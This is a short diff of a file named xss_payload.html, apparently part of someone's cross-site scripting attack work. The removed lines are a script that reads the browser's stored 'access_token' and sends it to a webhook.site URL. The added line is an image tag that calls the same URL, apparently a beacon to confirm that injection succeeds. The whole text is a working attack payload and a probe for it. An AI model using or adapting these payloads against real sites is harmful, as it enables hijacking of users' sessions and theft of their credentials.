--- a/xss_payload.html
+++ b/xss_payload.html
@@ -1,3 +1,1 @@
-<script>
-fetch("https://webhook.site/64b963bc-2bfe-4ed0-aa14-b7b423f02b8c?token=" + encodeURIComponent(localStorage.getItem("access_token")))
-</script>
+<img src="https://webhook.site/64b963bc-2bfe-4ed0-aa14-b7b423f02b8c?aa=ok">
